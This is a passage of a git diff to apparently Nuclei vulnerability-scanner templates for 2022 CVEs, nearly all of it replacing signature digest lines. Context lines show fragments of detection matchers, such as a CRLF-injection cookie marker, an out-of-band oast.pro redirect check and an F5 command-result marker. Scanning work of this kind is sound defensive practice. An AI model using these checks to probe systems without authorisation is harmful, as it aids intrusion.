-57,4 +57,4 @@ http: part: interactsh_request words: - "User-Agent: WordPress" -# digest: 4a0a00473045022050c800f22165b78eeeda568eae93aa6ad13be3c17759a4e4a051e32056d630fb022100bc6a9514b58758e47ce37be047e3846ad8b2d8eda04e468a964dbb7d400139cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d02c22a4e4310ae334dd129aa32767a9f24995f241fce07b3210e53c90b836a4022053bbdb41e95c700c9937a1dd0f8dddfcd030f25e33888dcc5dcf4a322ce9dd36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0597.yaml b/http/cves/2022/CVE-2022-0597.yaml index f9709be40d..7e1cad8f40 100644 --- a/http/cves/2022/CVE-2022-0597.yaml +++ b/http/cves/2022/CVE-2022-0597.yaml @@ -42,4 +42,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' part: header -# digest: 490a004630440220127fc3532e0b16006576991cfb52e73f85a92d3d884562d2ff7d24db0f8e96fa02206c7976189f51cf6b8c7f54d25230d5354bd8fe291b5c62619006558544871684:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220598d2816df64bce1f7795b6dd37c3d2341c8be852a224c1561332b99eb479e46022054670a033194088f40ff8617a6445da4adf85a7d42a5ec19a22a9ba5fb175cf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0651.yaml b/http/cves/2022/CVE-2022-0651.yaml index ad9616a750..42e88e0bba 100644 --- a/http/cves/2022/CVE-2022-0651.yaml +++ b/http/cves/2022/CVE-2022-0651.yaml @@ -60,4 +60,4 @@ http: regex: - '_wpnonce=([0-9a-zA-Z]+)' internal: true -# digest: 4a0a0047304502201be5e1ae5adef9aca9ac6cbfe29579d972dfd03a20e29140e9a439efe939de56022100ac808c12c9115eb6db6fe499d769a117091688e6b37dd3f332e64d6e97a1c99a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220035f12a4154a350d60447d690b6c52d7ff3ec9d78006be2879d49e848dd1ddf10220529c5ae15af4a1889b7ccb1e505d046daf41c212c9ff5926ad7818f19e2f5c12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0660.yaml b/http/cves/2022/CVE-2022-0660.yaml index 8c4bab886d..0828c526e1 100644 --- a/http/cves/2022/CVE-2022-0660.yaml +++ b/http/cves/2022/CVE-2022-0660.yaml @@ -62,4 +62,4 @@ http: - 'contains(header_2,"text/html")' - 'status_code_2==500' condition: and -# digest: 4a0a00473045022100b3691c4642ebd027767b09ea5d3f374e234b52ea9c2fc2458154fae7be2493a90220147c9b1c3754183476a4091136655e1b49fdf969330a8f16c89117c6ebac5879:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f8f6815cfac7a3a892c419d4782dc712e4a368d0daa09c3f22c3d581b0eb058f022100a3218c696f83a80030cae31c6b73410728cba9d16b1987d14c12ad31c4a5802f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0666.yaml b/http/cves/2022/CVE-2022-0666.yaml index 01e3b6c259..fe57653fc5 100644 --- a/http/cves/2022/CVE-2022-0666.yaml +++ b/http/cves/2022/CVE-2022-0666.yaml @@ -39,4 +39,4 @@ http: part: header regex: - "^Set-Cookie: crlfinjection=1;" -# digest: 4b0a00483046022100dbd652bb2a658ea86b3c2000925f84a9d94f2590ae25dcf69528a640aad4d9db022100ca9fb2e31600744fe5f05e0df21043f5c3922f1b82c6ab3729780e0e2e4203b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205cc98b07076fb5a03b964c0233b3061d3cb57d252d97ddac08dd0fe72f9d89910220718f6b5f4683020b4e8e462603fe6cf9648c217dbbe8c694a91f4315792d6acd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0678.yaml b/http/cves/2022/CVE-2022-0678.yaml index 2a6b1ee31c..6703d9f61b 100644 --- a/http/cves/2022/CVE-2022-0678.yaml +++ b/http/cves/2022/CVE-2022-0678.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 404 -# digest: 4a0a004730450220180a6af6f155054628da56264b03a6a512f10f2023af5d0b847eaf4dcdb83da6022100990a359990fc1e0627546724c539f3751cee25a7dbbed63c9a4936295da10c9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a2bae8053995b1fb173f11cafeb899542b9b1ed842c7244b6a4f4157d8d8a770022059a14a36a6b94a8dfd9201e91c576b8dbde82df3733f907bd00b87c14be86d32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0735.yaml b/http/cves/2022/CVE-2022-0735.yaml index 151a157ceb..975eef2608 100644 --- a/http/cves/2022/CVE-2022-0735.yaml +++ b/http/cves/2022/CVE-2022-0735.yaml @@ -115,4 +115,4 @@ http: group: 1 regex: - '(?:application-)(\S{64})(?:\.css)' -# digest: 4a0a0047304502206ac69e4ff94859665b85f9af28b56bb3a1b2785b4718fbb7c6a5374cac45086f022100a9024c393396acc395eba7ba18795618a16f1f4a8cc286ef5a0164e4a832ab2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022062e6fd4a07a57f2ca1f1328458412ae8f4b651972a77f6d10f42767f67cf015302201c0f6473f5c9807d9bd5fe6652d63a32bf246bf923405de7b57c684a239151ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0785.yaml b/http/cves/2022/CVE-2022-0785.yaml index 05827444ed..60f114071f 100644 --- a/http/cves/2022/CVE-2022-0785.yaml +++ b/http/cves/2022/CVE-2022-0785.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "dptTimetable customStyles dptUserStyles")' condition: and -# digest: 490a004630440220047b9e3a39f24f56c50f2752785d45e71679278a41f424b2a63453c25f0e804a02205bb7c6e0a0767f9b26d7457077500be9c71c5510072460f46ab3648037f66d54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220339f76f6589f61d951c6df49eebd9765622f4b1fc106f4f0baaa2c769568a0a2022100c9f4eb1905e780de95cb4f89bc8dcebc93ad8fa3134478bb83af9abf03ee8be7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0814.yaml b/http/cves/2022/CVE-2022-0814.yaml index c00020505c..b0fc7b8b24 100644 --- a/http/cves/2022/CVE-2022-0814.yaml +++ b/http/cves/2022/CVE-2022-0814.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022010bc2189231d243f08e665fb4a3b7569d771cde4b863887ee13498f58412906702205acc4428a2d8c2bd4452c096dc6361446e33a22431e8c1ec46b3b9bfaf8e9991:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fb4ec31b608894f19fb2aca3539cb2003d1a72b6544dee65be1c8ef8a221d3c3022026e6ea554b2da10a70b38e5a467406a45e593c8c05d8e95855ba2c9bca7886b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0870.yaml b/http/cves/2022/CVE-2022-0870.yaml index bc06fbf141..47b8c897c9 100644 --- a/http/cves/2022/CVE-2022-0870.yaml +++ b/http/cves/2022/CVE-2022-0870.yaml @@ -83,4 +83,4 @@ http: regex: - 'name="_csrf" content="(.*)"' internal: true -# digest: 4a0a00473045022034f359e6da198c9aa9d59b835bfa4da0c47d374d219d228481faacd36d1b8d2b022100e512d964c5f4bf885f34d4645822aa764cee7504a39714416fff903295205135:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a52e75c67b98859ba2cc103224254d9bf818b8fba325647eb3d21f995fe03c41022100d0eb460d4d3517515bec3fbf5234c2cda4af7f9baa55bd1a715c7b330ea74e0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0885.yaml b/http/cves/2022/CVE-2022-0885.yaml index 85d1490008..51247e1a10 100644 --- a/http/cves/2022/CVE-2022-0885.yaml +++ b/http/cves/2022/CVE-2022-0885.yaml @@ -55,4 +55,4 @@ http: regex: - '>PHP Version <\/td>([0-9.]+)' part: body -# digest: 4b0a00483046022100b4fb1717db82f33c727d7630be0f30acf28fd4aa8061ba9655763a3646dec87f0221008e64c392b94fb4a5a006bc6e41f3016f440cb60e4711e92f55692e94e8c19fa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206fb0aaaa4272d959a502470047fb0fdc6811ff0a04f0bfa13152420750a73b8c02203f2a2cb142c4ffeac3fc90214e860c3814529eacade9c6e123aa0e62d0383dae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0928.yaml b/http/cves/2022/CVE-2022-0928.yaml index 532767f004..a2f9c1a422 100644 --- a/http/cves/2022/CVE-2022-0928.yaml +++ b/http/cves/2022/CVE-2022-0928.yaml @@ -67,4 +67,4 @@ http: - 'contains(header_3,"text/html")' - 'status_code_2 == 200 && status_code_3 == 200' condition: and -# digest: 4b0a00483046022100f8bce570ebcb0f0d74eb041be1b52f254423a5768d3117aec796b360a124d195022100df65a65f7f5fa7a95872506df64e5f6d57b4e0e1279520187fc48d4f5a57ee19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206e090977c24d875c8b6221bd8ed20bc0111fce3a0eb4b70117706d02dc21591002210099fe65d9c7e83e1d4a93f6e5ec4f1cbacb3fbe41deddb3d2805f76bdb837b12c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0954.yaml b/http/cves/2022/CVE-2022-0954.yaml index 9317f3c6ed..17eaf84d0b 100644 --- a/http/cves/2022/CVE-2022-0954.yaml +++ b/http/cves/2022/CVE-2022-0954.yaml @@ -68,4 +68,4 @@ http: - 'contains(header_3,"text/html")' - 'status_code_3==200' condition: and -# digest: 4a0a0047304502207e4a03981dc32fe14244fb81dc5fbf27e611f0610881b12bab441ef665f244ce022100ca4d7b70e4c8aade25ea13a241809d1a4a6e8fcc75dabfbd42f23db0314190ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022071ca52c8427f3d60d45ab20d0d19764a001013f1910d379673a3e56d51dd93e802203981266b94dc753747809a7ec93259634bd21f45c20aeb6e5c9757fa46d72ed5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0963.yaml b/http/cves/2022/CVE-2022-0963.yaml index 68eb0a33e4..94b759ded2 100644 --- a/http/cves/2022/CVE-2022-0963.yaml +++ b/http/cves/2022/CVE-2022-0963.yaml @@ -78,4 +78,4 @@ http: - 'status_code_3==200' - 'contains(body_2,"bytes_uploaded")' condition: and -# digest: 4b0a00483046022100e2d8f53b3f53eb6ddda6130f5f72bc085998bfcec56f9b2260573d215a2aef76022100cb30d3fe32e752b77aaeb9d16dfcd6db7be9b17e1f600c0c4ac6f59d56350341:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202304db6f120a33e6ffae7e1c1f3227b72aec467ed884bf69e4d510127246a24a022016d9e7fcb4060480c3d8274cb05620b0e3ae804197d73525153a249f8b7f40b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0968.yaml b/http/cves/2022/CVE-2022-0968.yaml index e2de593779..1f841088be 100644 --- a/http/cves/2022/CVE-2022-0968.yaml +++ b/http/cves/2022/CVE-2022-0968.yaml @@ -87,4 +87,4 @@ http: - '' internal: true part: body -# digest: 4a0a0047304502203922095bcd981dd070eedc85c55f028b81289c2f65bba48e02e99afe1dad67b802210087bf0868a154b4a813ec7de4dc598e02fb77f13ac703c117d6bbdda831b2c2a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204da610ee6efcd11d4cc26e652457ecbd0be08a87689f51536e647fcbb5ec15b802202c1dfdb41f77090efb725c686a2bd378429bcd91123e43462a929ed82fbfa234:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-1040.yaml b/http/cves/2022/CVE-2022-1040.yaml index ce4e8f27c4..21769572ae 100644 --- a/http/cves/2022/CVE-2022-1040.yaml +++ b/http/cves/2022/CVE-2022-1040.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022030aea494fc72edafb129f331743bed83e1cd500aaabb8841cc51d8a9f78960350220180f8b9308a591480df76e7eb779564e2f4520c40457ab1576dc5258f28af4dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c2cfa4d9f51a318ea4fe14f4a603e6fe4d1e57912010d60faa567d8af5266bd3022023b1bc38580202b3ca2e16ae75c6ca604ad3220c2e64910ce64019f8b98df23d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-1058.yaml b/http/cves/2022/CVE-2022-1058.yaml index b921105049..233c56440f 100644 --- a/http/cves/2022/CVE-2022-1058.yaml +++ b/http/cves/2022/CVE-2022-1058.yaml @@ -69,4 +69,4 @@ http: regex: - 'name="_csrf" value="(.*)"' internal: true -# digest: 4b0a00483046022100b9bd4dc5868029580142685a0555c8d3c62b80e8b8069d23e5f8169115ca03b6022100f644deac426416657f1f59889a3b1b9285d58a11788f4ac4bfffc2c0e05568d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e11662a7a754761c55e20e8eb718c6173b1f2960ac3977b09dbeff117faf925e0220294d9e099b5b4b65642956cbbdc3d42e4a0479e3e5b32abf44f84d0752aab672:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-1162.yaml b/http/cves/2022/CVE-2022-1162.yaml index bee7559ba8..ba7d59de7f 100644 --- a/http/cves/2022/CVE-2022-1162.yaml +++ b/http/cves/2022/CVE-2022-1162.yaml @@ -57,4 +57,4 @@ http: group: 1 regex: - '(?:application-)(\S{64})(?:\.css)' -# digest: 490a0046304402203ba3e5ddaf42be1f7ab1183e2ff3f37a0d793d621a88c67319083a154377e44f02205d79563b10190b553c723da65865c114ea64af36abdeb45d9ac0cfe96ce58635:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201d27e91465b858457020c02b681720f074b5fd184e85b59b3bb81d5f34732a5a022100d5d6aab149151477b284b3ca627f077e6bc685cc7aec0b6e8cb2e8b601e3af8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-1170.yaml b/http/cves/2022/CVE-2022-1170.yaml index ff44d4dfc9..183647d09b 100644 --- a/http/cves/2022/CVE-2022-1170.yaml +++ b/http/cves/2022/CVE-2022-1170.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202ca231a8fa7811be5336afd5ff80303100f2c26a2c097681e2642cf7cff163c602206d0c3aa56405c8a326fb0c45d38a0f84fe124a86afa8c1f0b207a6f198c29c83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100949b3fb8fffb7c411e47099d898af9ad0cc885e111ca45d1760d8fc75b5c4a34022100d8bd6d1d525d26e41b602d4d62aed8b8b337c5e779950ffb4c5394415d64aea0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-1386.yaml b/http/cves/2022/CVE-2022-1386.yaml index 60dd241a09..79dd35b2e1 100644 --- a/http/cves/2022/CVE-2022-1386.yaml +++ b/http/cves/2022/CVE-2022-1386.yaml @@ -106,4 +106,4 @@ http: - //*[@id="fusion-form-nonce-0"] attribute: value part: body_1 -# digest: 4a0a0047304502207ca6b20fdfe5c4519c0b0d1504e67fb0ed32d4904f6f50b721d675005dc48ee9022100fc75706bd2786bc98da5689b63b09897982603bcab31dfc8698734882f6d5899:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d4d7286bb2adc3747133eb17cef30058b38c90b81a522b6d40888b196148602802201c20abf7e57ccc02665f3556f2f80a639366612848b0a085194af92f7e30f9a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-1388.yaml b/http/cves/2022/CVE-2022-1388.yaml index a9494c2fdb..f97bab4dd5 100644 --- a/http/cves/2022/CVE-2022-1388.yaml +++ b/http/cves/2022/CVE-2022-1388.yaml @@ -76,4 +76,4 @@ http: - "commandResult" - "8831-2202-EVC" condition: and -# digest: 4a0a00473045022100d010161cda6bed0d803f4c68a3071ddc1f66fd9714cbf11d0ecb5b963020b66902205ee01e2158f51cfcccda82f8e0752d0eab466cc0a2bbabd337e2a54ae6f23f89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f58305fa4b37c3010cc6bfa485829fdc63e597371fbb3d1ebabb94c4a4b3dc5e022038461476fb57ebbdb5164ea86d748bdf0561aa15136205a6744a5ba55c7bf7bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-1439.yaml b/http/cves/2022/CVE-2022-1439.yaml index 9d4a99d167..dad130d02f 100644 --- a/http/cves/2022/CVE-2022-1439.yaml +++ b/http/cves/2022/CVE-2022-1439.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022077fb78e1d57a16ddb887a6a9837496912e761370f4a9abd87b5637c0dec12e70022100b823ada2865084a8ab3d5756301378e0457faa2e768266e34f1fb8ab9682ee9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201063699044359713eb8d4a93a25701fe6373231d43eaa448d6b02156af966f39022012b3b21f6d247b3a95483de6b935e3c59b84c1df90eb8b80d1d51458cfc76df3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-1580.yaml b/http/cves/2022/CVE-2022-1580.yaml index 4d191b623b..262b716358 100644 --- a/http/cves/2022/CVE-2022-1580.yaml +++ b/http/cves/2022/CVE-2022-1580.yaml @@ -51,4 +51,4 @@ http: - 'contains_all(body, "wp-block", "author")' - 'status_code == 200' condition: and -# digest: 4b0a004830460221009c5c774a95cb5497871b3f6ef6e59a638ccd5c1b632808c2fb76052e3bf686fc022100aecb083a1abe1b2192f29c4d840da919836f3dc858153f0b7936a6c642240fec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220072d1ea8c6583e0d3fe84dc24f784423c21251e8eba6b1c28c9c98bf9362dcf40221009c36b590c9d4e5e4eba214c446cdac5ff2a7e0475283468004e64a314476be8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-1595.yaml b/http/cves/2022/CVE-2022-1595.yaml index 14ba5d55b4..2caaaf020d 100644 --- a/http/cves/2022/CVE-2022-1595.yaml +++ b/http/cves/2022/CVE-2022-1595.yaml @@ -42,4 +42,4 @@ http: - "contains(header, 'wordpress_')" - "contains(header, 'Location')" condition: and -# digest: 490a0046304402204d27883fc498f5aa445d32855be69c081c8564e779ac28ab176d3a965879dbe3022054938b2fb1c14552e52c1e0b247e097fc18a802f48e48ac7cfcc7b05af268aa4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203960ba3fcf0f154237cc81faeb6ed5e4ff63389fd38fe93d738f0330010ed185022100f2b894d4fbb8b1f0b32c75aab8eca417a14b0211ef533d9c18cd01994934bff1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-1609.yaml b/http/cves/2022/CVE-2022-1609.yaml index dea30ad832..e68c34ed1d 100644 --- a/http/cves/2022/CVE-2022-1609.yaml +++ b/http/cves/2022/CVE-2022-1609.yaml @@ -48,4 +48,4 @@ http: part: body words: - '9061-2202-EVC' -# digest: 4a0a0047304502200872372405ed22355feb5563998d7f95436c514c160cfeccf01a8b2abd46b860022100be3d47033c621fc7e1bb884a38a475d6cea39dca8c02c8eddbc4cbcaeb933025:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022006ac36ef4fb14e287e48e1479ad2fb77dc49199635a40a456cb0bf43a65436b002203dacc45bd8460cd438412e3c7c3e8568758fb7a8d18b6f4aa44023bed3192f89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-1713.yaml b/http/cves/2022/CVE-2022-1713.yaml index 61d599b2e6..9fb56998cf 100644 --- a/http/cves/2022/CVE-2022-1713.yaml +++ b/http/cves/2022/CVE-2022-1713.yaml @@ -52,4 +52,4 @@ http: part: header words: - "application/octet-stream" -# digest: 4b0a00483046022100c0b69d0bb952aa9c89b56a0d30df707d23f955b455ec19c1e7a0dc3c77af1f93022100d1d75549c4004d62a543ea805813b25e2004e82ac1031eb345501cb715a1c21c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bc3e23435ba29db5ba92fc9fa6556af1866a525caa77c4ac34279a4363ab705202201500e310475e790874fdfb4acb870aa3edfce5ddb7383c21e86e51085d504d88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-1724.yaml b/http/cves/2022/CVE-2022-1724.yaml index ef72c6a6d1..af9d139c8c 100644 --- a/http/cves/2022/CVE-2022-1724.yaml +++ b/http/cves/2022/CVE-2022-1724.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d284104de93b182d1704a792bdf51e256d3094c1c311c2b37ffe0b17d2f0cca302201543cd23a6fba386172040ad3430e6f03070f718e8061c3f2cf052e653f69edf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c2b314e94750eb6bfa04ca226cc6e1a0f72a07584c039cf68863e5042381ae360220019b581aa0e53e8c3321085a79c33b09cf6f91fc711caee456cd76efb5982908:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-1756.yaml b/http/cves/2022/CVE-2022-1756.yaml index 8bd91c588b..c1cb9ddbf9 100644 --- a/http/cves/2022/CVE-2022-1756.yaml +++ b/http/cves/2022/CVE-2022-1756.yaml @@ -51,4 +51,4 @@ http: - 'status_code == 200' - 'contains(body, "newsletter") && contains(body, ">")' condition: and -# digest: 4b0a00483046022100989134abdfbef495345ff45925cd102fc3e7329602c007b9fde7f98d4757ea85022100f241a505db3bc4352a12e195d6dbac38731c63f974cb3c1ecc00066c8fb803fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022066fd5868b20fabdbad5e8588d78ccc536fbb44d968d54f3ca36e62e9e27b7441022100a02ce38eae6e56b6a3c5c605dcce609583946db59084d461e93a713704a7920d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-1815.yaml b/http/cves/2022/CVE-2022-1815.yaml index d6e80f9806..5b55e51404 100644 --- a/http/cves/2022/CVE-2022-1815.yaml +++ b/http/cves/2022/CVE-2022-1815.yaml @@ -46,4 +46,4 @@ http: - "contains(body, 'Interactsh Server')" - status_code == 200 condition: and -# digest: 4a0a00473045022027ea678c8f795aad73302dc5e2041fdf095bd5c7d91d03a696575d5d0e8b0eae022100d73c9e773406ed56a54c5c66394feec06d06a121bad718c87a408f4b4d50f84a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205525ef52251a5826e5e791f575e7e6ba459cf39006efd5333e46f92e02fddc3a022100acb18c4cc3b0acd88e8c639c288b2d7164298eb652de16f41eda345df1d0a4c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-1883.yaml b/http/cves/2022/CVE-2022-1883.yaml index eb87787730..1c1062c2fb 100644 --- a/http/cves/2022/CVE-2022-1883.yaml +++ b/http/cves/2022/CVE-2022-1883.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e6eb7799d108599a28730d311d114c55336cb5dcd6a4f6db98c854c892ff9fd3022078ea291f9e12c5047a99021d2a47d944e5c5631fcb115870edd89b19521a70f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210099be5f0bb2305532acb4e0dcc4e9d5019be561850489e904047cce9e28fb97fa022032ed323b5aae0db9ef0ddfb86a47c75bcca951cc1ffd53056e6d6e290f3466f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-1906.yaml b/http/cves/2022/CVE-2022-1906.yaml index 7c624a7c6b..6f0c9ae9dc 100644 --- a/http/cves/2022/CVE-2022-1906.yaml +++ b/http/cves/2022/CVE-2022-1906.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220111642dd830f905e2bc61167a87ef7ebcfd011ba7a4a363b319011a140401c71022100b7518f220308a6293499e4376ea4c4ab4f15e4049da8ad1de2f82d91395dbe62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220726720de91602d6e90a3614c3242d8f4d37cf8efe432f9824a31ab1a85b90fd60221009b723a9f6f3bf999fe241ab04aa21c2138b5748cdb776b10c1e331d42a156006:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-1910.yaml b/http/cves/2022/CVE-2022-1910.yaml index 250b818361..61df31229f 100644 --- a/http/cves/2022/CVE-2022-1910.yaml +++ b/http/cves/2022/CVE-2022-1910.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210095da4cba1445ce2672ef3f517ef1c6d669dcc36a8bf279e8226987096f467dd302203913c2483071bdd8c43f90381e062b694a2a755c991947751fb9ce1bbd6022de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203a43dabd2837edc955d82764ba6d7cfba40aaf9ad0df4ad071d5c7b4b4648653022051532ff4de36c3ce0cf819a2ff17d7719d5c5e50f35904eb0204374109bbefed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-1952.yaml b/http/cves/2022/CVE-2022-1952.yaml index 5b2a41575f..fd1e258c41 100644 --- a/http/cves/2022/CVE-2022-1952.yaml +++ b/http/cves/2022/CVE-2022-1952.yaml @@ -82,4 +82,4 @@ http: regex: - 'wp-content\\\/uploads\\\/([0-9a-zA-Z]+).php' internal: true -# digest: 490a0046304402204fec2b14b39df87223fb508d844372a65f20a337ecd4c7a5564b360e4e13073802203486d79f36e911eec16b4eb65d8db2c3bc6f111e532d30f4bc6710f8e71a447b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220477d9fea2dffaff7d6df7291042f7e274697b96d1bd5020698d89d7c095fffb502206fe03d2b73ed901b9014d3e6e9fca74bef3d9a6252e3afd663fd04f2d61c3152:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-21371.yaml b/http/cves/2022/CVE-2022-21371.yaml index 9e6f313511..1dd8fff607 100644 --- a/http/cves/2022/CVE-2022-21371.yaml +++ b/http/cves/2022/CVE-2022-21371.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022054ec7e83532435b2bb1a152c45d311426b36624e427b152cb1a3d5ec82c90cec022100b460a303c401e45c2a8f9e850ad9014b078859b8ecbe390c7ffd68aab428f0fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f3927957dfceb6b130dfad742dc50048a66af5440697a38c30e6dfabbc6f75bf022100839f4947c58227e56f11c16dbe1c9d0b9e7e4e3af614ba54f4030603947a7d7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-21500.yaml b/http/cves/2022/CVE-2022-21500.yaml index 853618651c..29b265e202 100644 --- a/http/cves/2022/CVE-2022-21500.yaml +++ b/http/cves/2022/CVE-2022-21500.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022010929e8e8feb3cc1d691d0bd8658fc02eb7b31ae8caf40e465b275bc5ce199c5022100ff38a5e52a20b20b9446a532bf0b19fde10d4f763402a72fb283edf58866cd2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d7cda74095052fa09b4f108ba7d418de55d27c5653c3ceef430c5d6ff79785990221009a57be6104a07cb7968f77439b7a08461b4d248631989893d07027a75c83fc8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-21661.yaml b/http/cves/2022/CVE-2022-21661.yaml index 68568a5416..fd9b611572 100644 --- a/http/cves/2022/CVE-2022-21661.yaml +++ b/http/cves/2022/CVE-2022-21661.yaml @@ -50,4 +50,4 @@ http: - 'contains(body, "WordPress database error:")' - 'contains(body, "error in your SQL syntax")' condition: and -# digest: 4a0a004730450220425e36034cccd0b26ad53eed14893663a4444d6555aeec46fa9de4b460e40c70022100f33fd7e0c4aed650a70a95aedcc7313233b0660fe7c8b365111a630878c2648b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206598316e8faef7a149151c1b733d6d8489b06e658a8852a2f1da29c80f59d4af022100ebbbb5a14cce6dc6e29255866d2c53365998e16d8878c1f4582b96a38c4a94f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of 